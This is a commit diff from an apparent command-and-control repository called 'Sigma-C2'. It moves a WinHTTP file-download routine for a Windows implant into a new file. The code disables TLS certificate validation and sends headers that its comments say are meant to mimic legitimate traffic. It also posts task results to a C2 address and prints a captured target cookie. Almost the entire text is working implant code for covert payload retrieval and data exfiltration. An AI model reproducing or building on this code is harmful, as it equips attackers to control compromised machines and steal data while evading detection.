pkhazov/Sigma-C2
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Minor

Browse Source
This commit is contained in:
John Doe
2025-05-22 19:39:47 +02:00
parent e297caa408
commit 912d8a6116
4 changed files with 144 additions and 147 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
.gitignore vendored
View File

@@ -12,7 +12,6 @@ beacon/*.exe
beacon/scp.h
beaconC/obj
certificates
https
loot/
public
schannel

139
https/download_schannel.c Normal file
View File

@@ -0,0 +1,139 @@
// Function to download a file from a URL and save it to a local path
BOOL DownloadFile(LPCWSTR url, LPCWSTR localPath) {
HINTERNET hSession = NULL, hConnect = NULL, hRequest = NULL;
BOOL bResults = FALSE;
DWORD dwBytesRead = 0, dwBytesWritten = 0;
HANDLE hFile = INVALID_HANDLE_VALUE;
BYTE buffer[4096];
// Parse URL to extract host and path
URL_COMPONENTS urlComp = {0};
urlComp.dwStructSize = sizeof(urlComp);
urlComp.dwHostNameLength = -1;
urlComp.dwUrlPathLength = -1;
if (!WinHttpCrackUrl(url, 0, 0, &urlComp)) {
wprintf(L"WinHttpCrackUrl failed (%lu)\n", GetLastError());
return FALSE;
}
// Null-terminate host and path
wchar_t host[256] = {0};
wchar_t path[1024] = {0};
wcsncpy(host, urlComp.lpszHostName, urlComp.dwHostNameLength);
wcsncpy(path, urlComp.lpszUrlPath, urlComp.dwUrlPathLength);
// Open session
hSession = WinHttpOpen(USER_AGENT,
WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
WINHTTP_NO_PROXY_NAME,
WINHTTP_NO_PROXY_BYPASS, 0);
if (!hSession) {
wprintf(L"WinHttpOpen failed (%lu)\n", GetLastError());
goto cleanup;
}
// Connect
hConnect = WinHttpConnect(hSession, host, urlComp.nPort, 0);
if (!hConnect) {
wprintf(L"WinHttpConnect failed (%lu)\n", GetLastError());
goto cleanup;
}
// Create request
hRequest = WinHttpOpenRequest(hConnect, L"GET", path,
NULL, WINHTTP_NO_REFERER,
WINHTTP_DEFAULT_ACCEPT_TYPES,
(urlComp.nScheme == INTERNET_SCHEME_HTTPS) ? WINHTTP_FLAG_SECURE : 0);
if (!hRequest) {
wprintf(L"WinHttpOpenRequest failed (%lu)\n", GetLastError());
goto cleanup;
}
// Ignore certificate errors for HTTPS
if (urlComp.nScheme == INTERNET_SCHEME_HTTPS) {
DWORD securityFlags = SECURITY_FLAG_IGNORE_UNKNOWN_CA |
SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE |
SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
if (!WinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &securityFlags, sizeof(securityFlags))) {
wprintf(L"WinHttpSetOption failed (%lu)\n", GetLastError());
goto cleanup;
}
}
// Add headers
if (!WinHttpAddRequestHeaders(hRequest, CUSTOM_HEADER, (DWORD)-1L, WINHTTP_ADDREQ_FLAG_ADD)) {
wprintf(L"WinHttpAddRequestHeaders failed (%lu) for custom header\n", GetLastError());
}
for (int i = 0; i < NUM_COMMON_HEADERS; ++i) {
if (!WinHttpAddRequestHeaders(hRequest, COMMON_HEADERS[i], (DWORD)-1L, WINHTTP_ADDREQ_FLAG_ADD)) {
wprintf(L"WinHttpAddRequestHeaders failed (%lu) on common header %d\n", GetLastError(), i);
}
}
// Send request
bResults = WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0,
WINHTTP_NO_REQUEST_DATA, 0, 0, 0);
if (!bResults) {
wprintf(L"WinHttpSendRequest failed (%lu)\n", GetLastError());
goto cleanup;
}
// Receive response
bResults = WinHttpReceiveResponse(hRequest, NULL);
if (!bResults) {
wprintf(L"WinHttpReceiveResponse failed (%lu)\n", GetLastError());
goto cleanup;
}
// Check status code
DWORD dwStatusCode = 0;
DWORD dwSize = sizeof(dwStatusCode);
if (!WinHttpQueryHeaders(hRequest, WINHTTP_QUERY_STATUS_CODE | WINHTTP_QUERY_FLAG_NUMBER,
NULL, &dwStatusCode, &dwSize, NULL)) {
wprintf(L"WinHttpQueryHeaders failed (%lu)\n", GetLastError());
goto cleanup;
}
if (dwStatusCode != HTTP_STATUS_OK) {
wprintf(L"HTTP request failed with status code %lu\n", dwStatusCode);
goto cleanup;
}
// Create local file
hFile = CreateFile(localPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
wprintf(L"CreateFile failed (%lu) for path %s\n", GetLastError(), localPath);
goto cleanup;
}
// Read response body and write to file
do {
bResults = WinHttpReadData(hRequest, buffer, sizeof(buffer), &dwBytesRead);
if (!bResults) {
wprintf(L"WinHttpReadData failed (%lu)\n", GetLastError());
goto cleanup;
}
if (dwBytesRead == 0) {
break; // End of data
}
bResults = WriteFile(hFile, buffer, dwBytesRead, &dwBytesWritten, NULL);
if (!bResults || dwBytesWritten != dwBytesRead) {
wprintf(L"WriteFile failed (%lu)\n", GetLastError());
goto cleanup;
}
} while (dwBytesRead > 0);
wprintf(L"File downloaded successfully to %s\n", localPath);
bResults = TRUE;
cleanup:
if (hFile != INVALID_HANDLE_VALUE) CloseHandle(hFile);
if (hRequest) WinHttpCloseHandle(hRequest);
if (hConnect) WinHttpCloseHandle(hConnect);
if (hSession) WinHttpCloseHandle(hSession);
return bResults;
}

149
https/winhttp.c
View File

@@ -6,10 +6,14 @@
#include <fcntl.h> // for _O_U16TEXT
// --- Configurable Variables ---
// User agent to identify implant against server
const wchar_t *USER_AGENT = L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
// Custom header to identify against server
const wchar_t *CUSTOM_HEADER = L"Accept-Language: en-US,en;q=0.9\r\n";
// Common headers to mimic legit http traffic
const wchar_t *COMMON_HEADERS[] = {
L"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n",
L"Cache-Control: no-cache\r\n",
@@ -90,145 +94,6 @@ void CheckHeaderAndPrintCookie(const wchar_t *headers, const wchar_t *cookies) {
wprintf(L"\n[+] Target cookie found: %S\n", cookieValue);
}
// Function to download a file from a URL and save it to a local path
BOOL DownloadFile(LPCWSTR url, LPCWSTR localPath) {
HINTERNET hSession = NULL, hConnect = NULL, hRequest = NULL;
BOOL bResults = FALSE;
DWORD dwBytesRead = 0, dwBytesWritten = 0;
HANDLE hFile = INVALID_HANDLE_VALUE;
BYTE buffer[4096];
// Parse URL to extract host and path
URL_COMPONENTS urlComp = {0};
urlComp.dwStructSize = sizeof(urlComp);
urlComp.dwHostNameLength = -1;
urlComp.dwUrlPathLength = -1;
if (!WinHttpCrackUrl(url, 0, 0, &urlComp)) {
wprintf(L"WinHttpCrackUrl failed (%lu)\n", GetLastError());
return FALSE;
}
// Null-terminate host and path
wchar_t host[256] = {0};
wchar_t path[1024] = {0};
wcsncpy(host, urlComp.lpszHostName, urlComp.dwHostNameLength);
wcsncpy(path, urlComp.lpszUrlPath, urlComp.dwUrlPathLength);
// Open session
hSession = WinHttpOpen(USER_AGENT,
WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
WINHTTP_NO_PROXY_NAME,
WINHTTP_NO_PROXY_BYPASS, 0);
if (!hSession) {
wprintf(L"WinHttpOpen failed (%lu)\n", GetLastError());
goto cleanup;
}
// Connect
hConnect = WinHttpConnect(hSession, host, urlComp.nPort, 0);
if (!hConnect) {
wprintf(L"WinHttpConnect failed (%lu)\n", GetLastError());
goto cleanup;
}
// Create request
hRequest = WinHttpOpenRequest(hConnect, L"GET", path,
NULL, WINHTTP_NO_REFERER,
WINHTTP_DEFAULT_ACCEPT_TYPES,
(urlComp.nScheme == INTERNET_SCHEME_HTTPS) ? WINHTTP_FLAG_SECURE : 0);
if (!hRequest) {
wprintf(L"WinHttpOpenRequest failed (%lu)\n", GetLastError());
goto cleanup;
}
// Ignore certificate errors for HTTPS
if (urlComp.nScheme == INTERNET_SCHEME_HTTPS) {
DWORD securityFlags = SECURITY_FLAG_IGNORE_UNKNOWN_CA |
SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE |
SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
if (!WinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &securityFlags, sizeof(securityFlags))) {
wprintf(L"WinHttpSetOption failed (%lu)\n", GetLastError());
goto cleanup;
}
}
// Add headers
if (!WinHttpAddRequestHeaders(hRequest, CUSTOM_HEADER, (DWORD)-1L, WINHTTP_ADDREQ_FLAG_ADD)) {
wprintf(L"WinHttpAddRequestHeaders failed (%lu) for custom header\n", GetLastError());
}
for (int i = 0; i < NUM_COMMON_HEADERS; ++i) {
if (!WinHttpAddRequestHeaders(hRequest, COMMON_HEADERS[i], (DWORD)-1L, WINHTTP_ADDREQ_FLAG_ADD)) {
wprintf(L"WinHttpAddRequestHeaders failed (%lu) on common header %d\n", GetLastError(), i);
}
}
// Send request
bResults = WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0,
WINHTTP_NO_REQUEST_DATA, 0, 0, 0);
if (!bResults) {
wprintf(L"WinHttpSendRequest failed (%lu)\n", GetLastError());
goto cleanup;
}
// Receive response
bResults = WinHttpReceiveResponse(hRequest, NULL);
if (!bResults) {
wprintf(L"WinHttpReceiveResponse failed (%lu)\n", GetLastError());
goto cleanup;
}
// Check status code
DWORD dwStatusCode = 0;
DWORD dwSize = sizeof(dwStatusCode);
if (!WinHttpQueryHeaders(hRequest, WINHTTP_QUERY_STATUS_CODE | WINHTTP_QUERY_FLAG_NUMBER,
NULL, &dwStatusCode, &dwSize, NULL)) {
wprintf(L"WinHttpQueryHeaders failed (%lu)\n", GetLastError());
goto cleanup;
}
if (dwStatusCode != HTTP_STATUS_OK) {
wprintf(L"HTTP request failed with status code %lu\n", dwStatusCode);
goto cleanup;
}
// Create local file
hFile = CreateFile(localPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
wprintf(L"CreateFile failed (%lu) for path %s\n", GetLastError(), localPath);
goto cleanup;
}
// Read response body and write to file
do {
bResults = WinHttpReadData(hRequest, buffer, sizeof(buffer), &dwBytesRead);
if (!bResults) {
wprintf(L"WinHttpReadData failed (%lu)\n", GetLastError());
goto cleanup;
}
if (dwBytesRead == 0) {
break; // End of data
}
bResults = WriteFile(hFile, buffer, dwBytesRead, &dwBytesWritten, NULL);
if (!bResults || dwBytesWritten != dwBytesRead) {
wprintf(L"WriteFile failed (%lu)\n", GetLastError());
goto cleanup;
}
} while (dwBytesRead > 0);
wprintf(L"File downloaded successfully to %s\n", localPath);
bResults = TRUE;
cleanup:
if (hFile != INVALID_HANDLE_VALUE) CloseHandle(hFile);
if (hRequest) WinHttpCloseHandle(hRequest);
if (hConnect) WinHttpCloseHandle(hConnect);
if (hSession) WinHttpCloseHandle(hSession);
return bResults;
}
// Function to perform the HTTPS request
void HttpRequest(LPCWSTR domain, INTERNET_PORT port, LPCWSTR method, LPCWSTR message) {
HINTERNET hSession = NULL, hConnect = NULL, hRequest = NULL;
@@ -391,11 +256,5 @@ int main() {
const wchar_t *message = L"SecretMessage123";
sendTaskResult(L"192.168.1.4", 443, message);
// Download a file (example)
wprintf(L"\nDownloading file:\n");
if (!DownloadFile(L"https://example.com/sample.txt", L"C:\\Downloads\\sample.txt")) {
wprintf(L"File download failed\n");
}
return 0;
}

2
operator_commands.go
View File

@@ -72,7 +72,7 @@ func InitModules() error {
}
modules[fileName] = module
log.Printf("Loaded module: %s (%s)", fileName, path)
// log.Printf("Loaded module: %s (%s)", fileName, path)
return nil
})